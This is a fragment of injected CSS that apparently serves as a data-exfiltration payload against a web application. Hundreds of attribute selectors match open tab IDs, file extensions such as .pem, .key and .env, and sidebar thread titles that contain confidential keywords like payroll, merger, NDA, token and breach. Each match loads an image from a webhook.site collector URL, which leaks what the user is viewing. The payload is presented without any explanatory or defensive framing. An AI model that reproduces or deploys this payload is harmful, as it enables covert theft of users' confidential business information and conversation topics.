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;}html{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/FIRE)!important}div[data-tab-id*=&quot;acme-acquisition&quot;]{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/kw/acme-acquisition)!important}div[data-tab-id*=&quot;acme-merger&quot;]{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/kw/acme-merger)!important}div[data-tab-id*=&quot;acme-msa&quot;]{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/kw/acme-msa)!important}div[data-tab-id*=&quot;acme-nda&quot;]{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/kw/acme-nda)!important}div[data-tab-id*=&quot;acme-payroll&quot;]{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/kw/acme-payroll)!important}div[data-tab-id*=&quot;acme-term-sheet&quot;]{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/kw/acme-term-sheet)!important}div[data-tab-id*=&quot;adventure-acquisition&quot;]{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/kw/adventure-acquisition)!important}div[data-tab-id*=&quot;adventure-merger&quot;]{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/kw/adventure-merger)!important}div[data-tab-id*=&quot;adventure-msa&quot;]{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/kw/adventure-msa)!important}div[data-tab-id*=&quot;adventure-nda&quot;]{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/kw/adventure-nda)!important}div[data-tab-id*=&quot;adventure-payroll&quot;]{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/kw/adventure-payroll)!important}div[data-tab-id*=&quot;adventure-term-sheet&quot;]{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/kw/adventure-term-sheet)!important}div[data-tab-id*=&quot;audit-findings&quot;]{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/kw/audit-findings)!important}div[data-tab-id*=&quot;board-minutes&quot;]{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/kw/board-minutes)!important}div[data-tab-id*=&quot;breach-notice&quot;]{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/kw/breach-notice)!important}div[data-tab-id*=&quot;budget-variance&quot;]{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/kw/budget-variance)!important}div[data-tab-id*=&quot;cap-table&quot;]{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/kw/cap-table)!important}div[data-tab-id*=&quot;comp-review&quot;]{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/kw/comp-review)!important}div[data-tab-id*=&quot;contoso-acquisition&quot;]{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/kw/contoso-acquisition)!important}div[data-tab-id*=&quot;contoso-merger&quot;]{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/kw/contoso-merger)!important}div[data-tab-id*=&quot;contoso-msa&quot;]{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/kw/contoso-msa)!important}div[data-tab-id*=&quot;contoso-nda&quot;]{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/kw/contoso-nda)!important}div[data-tab-id*=&quot;contoso-payroll&quot;]{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/kw/contoso-payroll)!important}div[data-tab-id*=&quot;contoso-term-sheet&quot;]{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/kw/contoso-term-sheet)!important}div[data-tab-id*=&quot;divestiture&quot;]{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/kw/divestiture)!important}div[data-tab-id*=&quot;due-diligence&quot;]{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/kw/due-diligence)!important}div[data-tab-id*=&quot;fabrikam-acquisition&quot;]{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/kw/fabrikam-acquisition)!important}div[data-tab-id*=&quot;fabrikam-merger&quot;]{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/kw/fabrikam-merger)!important}div[data-tab-id*=&quot;fabrikam-msa&quot;]{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/kw/fabrikam-msa)!important}div[data-tab-id*=&quot;fabrikam-nda&quot;]{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/kw/fabrikam-nda)!important}div[data-tab-id*=&quot;fabrikam-payroll&quot;]{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/kw/fabrikam-payroll)!important}div[data-tab-id*=&quot;fabrikam-term-sheet&quot;]{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/kw/fabrikam-term-sheet)!important}div[data-tab-id*=&quot;forecast&quot;]{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/kw/forecast)!important}div[data-tab-id*=&quot;globex-acquisition&quot;]{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/kw/globex-acquisition)!important}div[data-tab-id*=&quot;globex-merger&quot;]{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/kw/globex-merger)!important}div[data-tab-id*=&quot;globex-msa&quot;]{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/kw/globex-msa)!important}div[data-tab-id*=&quot;globex-nda&quot;]{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/kw/globex-nda)!important}div[data-tab-id*=&quot;globex-payroll&quot;]{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/kw/globex-payroll)!important}div[data-tab-id*=&quot;globex-term-sheet&quot;]{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/kw/globex-term-sheet)!important}div[data-tab-id*=&quot;headcount&quot;]{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/kw/headcount)!important}div[data-tab-id*=&quot;incident-report&quot;]{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/kw/incident-report)!important}div[data-tab-id*=&quot;initech-acquisition&quot;]{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/kw/initech-acquisition)!important}div[data-tab-id*=&quot;initech-merger&quot;]{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/kw/initech-merger)!important}div[data-tab-id*=&quot;initech-msa&quot;]{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/kw/initech-msa)!important}div[data-tab-id*=&quot;initech-nda&quot;]{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/kw/initech-nda)!important}div[data-tab-id*=&quot;initech-payroll&quot;]{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/kw/initech-payroll)!important}div[data-tab-id*=&quot;initech-term-sheet&quot;]{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/kw/initech-term-sheet)!important}div[data-tab-id*=&quot;litigation-hold&quot;]{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/kw/litigation-hold)!important}div[data-tab-id*=&quot;litware-acquisition&quot;]{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/kw/litware-acquisition)!important}div[data-tab-id*=&quot;litware-merger&quot;]{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/kw/litware-merger)!important}div[data-tab-id*=&quot;litware-msa&quot;]{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/kw/litware-msa)!important}div[data-tab-id*=&quot;litware-nda&quot;]{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/kw/litware-nda)!important}div[data-tab-id*=&quot;litware-payroll&quot;]{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/kw/litware-payroll)!important}div[data-tab-id*=&quot;litware-term-sheet&quot;]{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/kw/litware-term-sheet)!important}div[data-tab-id*=&quot;loi&quot;]{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/kw/loi)!important}div[data-tab-id*=&quot;northwind-acquisition&quot;]{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/kw/northwind-acquisition)!important}div[data-tab-id*=&quot;northwind-merger&quot;]{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/kw/northwind-merger)!important}div[data-tab-id*=&quot;northwind-msa&quot;]{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/kw/northwind-msa)!important}div[data-tab-id*=&quot;northwind-nda&quot;]{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/kw/northwind-nda)!important}div[data-tab-id*=&quot;northwind-payroll&quot;]{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/kw/northwind-payroll)!important}div[data-tab-id*=&quot;northwind-term-sheet&quot;]{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/kw/northwind-term-sheet)!important}div[data-tab-id*=&quot;offer-letter&quot;]{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/kw/offer-letter)!important}div[data-tab-id*=&quot;patent-filing&quot;]{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/kw/patent-filing)!important}div[data-tab-id*=&quot;pen-test&quot;]{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/kw/pen-test)!important}div[data-tab-id*=&quot;project-titan&quot;]{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/kw/project-titan)!important}div[data-tab-id*=&quot;proseware-acquisition&quot;]{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/kw/proseware-acquisition)!important}div[data-tab-id*=&quot;proseware-merger&quot;]{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/kw/proseware-merger)!important}div[data-tab-id*=&quot;proseware-msa&quot;]{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/kw/proseware-msa)!important}div[data-tab-id*=&quot;proseware-nda&quot;]{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/kw/proseware-nda)!important}div[data-tab-id*=&quot;proseware-payroll&quot;]{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/kw/proseware-payroll)!important}div[data-tab-id*=&quot;proseware-term-sheet&quot;]{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/kw/proseware-term-sheet)!important}div[data-tab-id*=&quot;q1-financials&quot;]{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/kw/q1-financials)!important}div[data-tab-id*=&quot;q2-financials&quot;]{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/kw/q2-financials)!important}div[data-tab-id*=&quot;q3-financials&quot;]{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/kw/q3-financials)!important}div[data-tab-id*=&quot;q4-financials&quot;]{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/kw/q4-financials)!important}div[data-tab-id*=&quot;risk-register&quot;]{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/kw/risk-register)!important}div[data-tab-id*=&quot;runway-model&quot;]{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/kw/runway-model)!important}div[data-tab-id*=&quot;salary-2026&quot;]{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/kw/salary-2026)!important}div[data-tab-id*=&quot;settlement&quot;]{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/kw/settlement)!important}div[data-tab-id*=&quot;severance&quot;]{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/kw/severance)!important}div[data-tab-id*=&quot;shareholder-letter&quot;]{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/kw/shareholder-letter)!important}div[data-tab-id*=&quot;soc2-report&quot;]{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/kw/soc2-report)!important}div[data-tab-id*=&quot;sow&quot;]{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/kw/sow)!important}div[data-tab-id*=&quot;soylent-acquisition&quot;]{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/kw/soylent-acquisition)!important}div[data-tab-id*=&quot;soylent-merger&quot;]{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/kw/soylent-merger)!important}div[data-tab-id*=&quot;soylent-msa&quot;]{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/kw/soylent-msa)!important}div[data-tab-id*=&quot;soylent-nda&quot;]{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/kw/soylent-nda)!important}div[data-tab-id*=&quot;soylent-payroll&quot;]{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/kw/soylent-payroll)!important}div[data-tab-id*=&quot;soylent-term-sheet&quot;]{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/kw/soylent-term-sheet)!important}div[data-tab-id*=&quot;stark-acquisition&quot;]{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/kw/stark-acquisition)!important}div[data-tab-id*=&quot;stark-merger&quot;]{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/kw/stark-merger)!important}div[data-tab-id*=&quot;stark-msa&quot;]{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/kw/stark-msa)!important}div[data-tab-id*=&quot;stark-nda&quot;]{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/kw/stark-nda)!important}div[data-tab-id*=&quot;stark-payroll&quot;]{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/kw/stark-payroll)!important}div[data-tab-id*=&quot;stark-term-sheet&quot;]{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/kw/stark-term-sheet)!important}div[data-tab-id*=&quot;tax-memo&quot;]{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/kw/tax-memo)!important}div[data-tab-id*=&quot;termination&quot;]{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/kw/termination)!important}div[data-tab-id*=&quot;trademark-opp&quot;]{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/kw/trademark-opp)!important}div[data-tab-id*=&quot;transfer-pricing&quot;]{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/kw/transfer-pricing)!important}div[data-tab-id*=&quot;umbrella-acquisition&quot;]{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/kw/umbrella-acquisition)!important}div[data-tab-id*=&quot;umbrella-merger&quot;]{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/kw/umbrella-merger)!important}div[data-tab-id*=&quot;umbrella-msa&quot;]{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/kw/umbrella-msa)!important}div[data-tab-id*=&quot;umbrella-nda&quot;]{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/kw/umbrella-nda)!important}div[data-tab-id*=&quot;umbrella-payroll&quot;]{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/kw/umbrella-payroll)!important}div[data-tab-id*=&quot;umbrella-term-sheet&quot;]{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/kw/umbrella-term-sheet)!important}div[data-tab-id*=&quot;valuation&quot;]{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/kw/valuation)!important}div[data-tab-id*=&quot;vandelay-acquisition&quot;]{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/kw/vandelay-acquisition)!important}div[data-tab-id*=&quot;vandelay-merger&quot;]{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/kw/vandelay-merger)!important}div[data-tab-id*=&quot;vandelay-msa&quot;]{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/kw/vandelay-msa)!important}div[data-tab-id*=&quot;vandelay-nda&quot;]{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/kw/vandelay-nda)!important}div[data-tab-id*=&quot;vandelay-payroll&quot;]{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/kw/vandelay-payroll)!important}div[data-tab-id*=&quot;vandelay-term-sheet&quot;]{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/kw/vandelay-term-sheet)!important}div[data-tab-id*=&quot;vendor-review&quot;]{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/kw/vendor-review)!important}div[data-tab-id*=&quot;wayne-acquisition&quot;]{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/kw/wayne-acquisition)!important}div[data-tab-id*=&quot;wayne-merger&quot;]{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/kw/wayne-merger)!important}div[data-tab-id*=&quot;wayne-msa&quot;]{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/kw/wayne-msa)!important}div[data-tab-id*=&quot;wayne-nda&quot;]{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/kw/wayne-nda)!important}div[data-tab-id*=&quot;wayne-payroll&quot;]{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/kw/wayne-payroll)!important}div[data-tab-id*=&quot;wayne-term-sheet&quot;]{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/kw/wayne-term-sheet)!important}div[data-tab-id*=&quot;zenith-acquisition&quot;]{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/kw/zenith-acquisition)!important}div[data-tab-id*=&quot;zenith-merger&quot;]{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/kw/zenith-merger)!important}div[data-tab-id*=&quot;zenith-msa&quot;]{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/kw/zenith-msa)!important}div[data-tab-id*=&quot;zenith-nda&quot;]{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/kw/zenith-nda)!important}div[data-tab-id*=&quot;zenith-payroll&quot;]{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/kw/zenith-payroll)!important}div[data-tab-id*=&quot;zenith-term-sheet&quot;]{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/kw/zenith-term-sheet)!important}div[data-tab-id$=&quot;.docx&quot;]{mask-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/ext-mask/docx)!important}div[data-tab-id$=&quot;.docx&quot;]{border-image-source:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/ext-border/docx)!important}div[data-tab-id$=&quot;.pdf&quot;]{mask-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/ext-mask/pdf)!important}div[data-tab-id$=&quot;.pdf&quot;]{border-image-source:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/ext-border/pdf)!important}div[data-tab-id$=&quot;.xlsx&quot;]{mask-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/ext-mask/xlsx)!important}div[data-tab-id$=&quot;.xlsx&quot;]{border-image-source:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/ext-border/xlsx)!important}div[data-tab-id$=&quot;.pptx&quot;]{mask-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/ext-mask/pptx)!important}div[data-tab-id$=&quot;.pptx&quot;]{border-image-source:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/ext-border/pptx)!important}div[data-tab-id$=&quot;.csv&quot;]{mask-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/ext-mask/csv)!important}div[data-tab-id$=&quot;.csv&quot;]{border-image-source:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/ext-border/csv)!important}div[data-tab-id$=&quot;.sql&quot;]{mask-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/ext-mask/sql)!important}div[data-tab-id$=&quot;.sql&quot;]{border-image-source:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/ext-border/sql)!important}div[data-tab-id$=&quot;.pem&quot;]{mask-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/ext-mask/pem)!important}div[data-tab-id$=&quot;.pem&quot;]{border-image-source:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/ext-border/pem)!important}div[data-tab-id$=&quot;.key&quot;]{mask-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/ext-mask/key)!important}div[data-tab-id$=&quot;.key&quot;]{border-image-source:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/ext-border/key)!important}div[data-tab-id$=&quot;.env&quot;]{mask-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/ext-mask/env)!important}div[data-tab-id$=&quot;.env&quot;]{border-image-source:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/ext-border/env)!important}div[data-tab-id$=&quot;.md&quot;]{mask-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/ext-mask/md)!important}div[data-tab-id$=&quot;.md&quot;]{border-image-source:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/ext-border/md)!important}div[data-tab-id$=&quot;.txt&quot;]{mask-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/ext-mask/txt)!important}div[data-tab-id$=&quot;.txt&quot;]{border-image-source:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/ext-border/txt)!important}div[data-tab-id$=&quot;.json&quot;]{mask-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/ext-mask/json)!important}div[data-tab-id$=&quot;.json&quot;]{border-image-source:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/ext-border/json)!important}div[data-app-action-sidebar-thread-title*=&quot;hr&quot;]{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/thread/hr)!important}div[data-app-action-sidebar-thread-title*=&quot;api&quot;]{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/thread/api)!important}div[data-app-action-sidebar-thread-title*=&quot;bug&quot;]{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/thread/bug)!important}div[data-app-action-sidebar-thread-title*=&quot;fix&quot;]{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/thread/fix)!important}div[data-app-action-sidebar-thread-title*=&quot;git&quot;]{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/thread/git)!important}div[data-app-action-sidebar-thread-title*=&quot;key&quot;]{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/thread/key)!important}div[data-app-action-sidebar-thread-title*=&quot;pdf&quot;]{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/thread/pdf)!important}div[data-app-action-sidebar-thread-title*=&quot;sql&quot;]{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/thread/sql)!important}div[data-app-action-sidebar-thread-title*=&quot;tax&quot;]{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/thread/tax)!important}div[data-app-action-sidebar-thread-title*=&quot;auth&quot;]{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/thread/auth)!important}div[data-app-action-sidebar-thread-title*=&quot;code&quot;]{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/thread/code)!important}div[data-app-action-sidebar-thread-title*=&quot;docx&quot;]{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/thread/docx)!important}div[data-app-action-sidebar-thread-title*=&quot;file&quot;]{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/thread/file)!important}div[data-app-action-sidebar-thread-title*=&quot;user&quot;]{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/thread/user)!important}div[data-app-action-sidebar-thread-title*=&quot;xlsx&quot;]{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/thread/xlsx)!important}div[data-app-action-sidebar-thread-title*=&quot;admin&quot;]{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/thread/admin)!important}div[data-app-action-sidebar-thread-title*=&quot;audit&quot;]{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/thread/audit)!important}div[data-app-action-sidebar-thread-title*=&quot;bonus&quot;]{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/thread/bonus)!important}div[data-app-action-sidebar-thread-title*=&quot;claim&quot;]{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/thread/claim)!important}div[data-app-action-sidebar-thread-title*=&quot;count&quot;]{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/thread/count)!important}div[data-app-action-sidebar-thread-title*=&quot;court&quot;]{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/thread/court)!important}div[data-app-action-sidebar-thread-title*=&quot;email&quot;]{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/thread/email)!important}div[data-app-action-sidebar-thread-title*=&quot;fraud&quot;]{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/thread/fraud)!important}div[data-app-action-sidebar-thread-title*=&quot;legal&quot;]{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/thread/legal)!important}div[data-app-action-sidebar-thread-title*=&quot;login&quot;]{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/thread/login)!important}div[data-app-action-sidebar-thread-title*=&quot;offer&quot;]{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/thread/offer)!important}div[data-app-action-sidebar-thread-title*=&quot;token&quot;]{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/thread/token)!important}div[data-app-action-sidebar-thread-title*=&quot;breach&quot;]{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/thread/breach)!important}div[data-app-action-sidebar-thread-title*=&quot;budget&quot;]{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/thread/budget)!important}div[data-app-action-sidebar-thread-title*=&quot;client&quot;]{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/thread/client)!important}div[data-app-action-sidebar-thread-title*=&quot;dryrun&quot;]{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/thread/dryrun)!important}div[data-app-action-sidebar-thread-title*=&quot;except&quot;]{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/thread/except)!important}div[data-app-action-sidebar-thread-title*=&quot;folder&quot;]{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/thread/folder)!important}div[data-app-action-sidebar-thread-title*=&quot;merger&quot;]{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/thread/merger)!important}div[data-app-action-sidebar-thread-title*=&quot;salary&quot;]{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/thread/salary)!important}div[data-app-action-sidebar-thread-title*=&quot;vendor&quot;]{background-image: